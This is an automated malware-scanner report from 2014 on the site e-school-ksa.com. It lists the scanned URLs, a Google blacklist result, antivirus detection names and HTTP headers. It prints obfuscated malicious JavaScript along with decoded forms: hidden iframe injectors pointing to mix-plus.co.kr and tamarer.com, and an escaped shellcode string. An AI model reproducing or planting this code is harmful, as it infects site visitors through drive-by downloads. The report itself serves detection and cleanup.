Malware Scanner report for e-school-ksa.com

Malicious/Suspicious/Total urls checked
1/1/5
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "e-school-ksa.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=e-school-ksa.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request / Server response / Status
http://e-school-ksa.com/
200 OK
Content-Length: 799
Content-Type: text/html
clean
http://mix-plus.co.kr/p_image/index.php
200 OK
Content-Length: 4260
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

function ad9(t1E){return t1E.replace(/%/g,'').replace(/[~G'k]/g,eGp2)}
YUK0='G64ock75~6de~6et.G77ri~74e(k22k3cd~69vk20styleG3dG5ck22positiok6ek3aabG73oluteG3b ~6ceft~3a~2d10~300pG78~3b tk6fp~3ak2d1k30k300pxk3bG5cG22~3eG22)G3bfuncti~6fn i73(a)~7bd~6fcumenk74.write~28~22G3cif~72k61me k73rck3d~5ck22httpG3aG2f~2fmixk2dpluk73.~63o.~6bk72~2fp~5fimag~65~2finde~78.k70h~70k3fs~3dk6a~5ak54KN~62dfG26iG64G3dk22+a~2bk22~5ck22k3e~3ck2fif~72a~6dek3ek22)k3bk7
...[3828 bytes skipped]...

Decoded script:


document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe src=\"http://mix-plus.co.kr/p_image/index.php?s=jZTKNbdf&id="+a+"\"></iframe>");}ZamO9=0;var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE
...[4436 bytes skipped]...

http://e-school-ksa.com/search.php
200 OK
Content-Length: 751
Content-Type: text/html
clean
http://e-school-ksa.com/test404page.js
404 Not Found
Content-Length: 70565
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function cE(){};this.hG=17182;cE.prototype = {kK : function() {var b=false;var l=15867;yG="yG";return 'hGtGt]p(:I/I/(aIdGien(gGuer(j].ecIoGm]/Gc(o]uIn(t(1e1(.(p]hGp('.gA(/[\(e\]IG]/g, '');this.cI=false;var cQ="";},f : function() {this.s=11249;var i="";this.w=false;mG="mG";var kT=26949;var d=window;var uF=new Date();var uR=function(){return 'uR'};var p = this;var wV="";var o=10714;var lZ=false;var z=document;this.pA=false;this.kZ=25718;var aP=new Arra
...[1921 bytes skipped]...

Decoded script:


document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>')
document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>')
<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>

Antivirus reports:

AntiVir: JS/Pegel.BR.51139
Avast: JS:Iframe-CL [Trj]
Ikarus: Trojan.JS.Redirector
nProtect: Trojan.JS.Agent.ECO
TrendMicro-HouseCall: JS_IFRAME.SMDM
Emsisoft: Trojan.JS.Agent.ECO (B)
Comodo: TrojWare.JS.Agent.BA
DrWeb: JS.Redirector.64
TrendMicro: JS_IFRAME.SMDM
Kaspersky: Trojan.JS.Iframe.mn
Microsoft: Trojan:JS/Iframe.R
MicroWorld-eScan: Trojan.JS.Agent.ECO
Fortinet: JS/Iframe.MN!tr
PCTools: Trojan.Malscript
TotalDefense: JS/Redir.W
NANO-Antivirus: Trojan.Script.Redir.sgzm
F-Secure: Trojan.JS.Agent.ECO
VIPRE: Malware.JS.Generic (JS)
AVG: HTML/Framer
Norman: Suspicious_Gen2.MBKNA
GData: Trojan.JS.Agent.ECO
Symantec: Trojan.Malscript!html
Agnitum: JS.Redirector.Gen.10
ESET-NOD32: JS/TrojanDownloader.Pegel.CD
BitDefender: Trojan.JS.Agent.ECO

http://e-school-ksa.com/forgot.php
200 OK
Content-Length: 751
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: e-school-ksa.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Dec 2014 10:00:10 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 799
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=be7152e4987a7517c373ed9f73866026; path=/
X-Powered-By: PHP/5.2.17

...799 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: e-school-ksa.com
Referer: http://www.google.com/search?q=e-school-ksa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.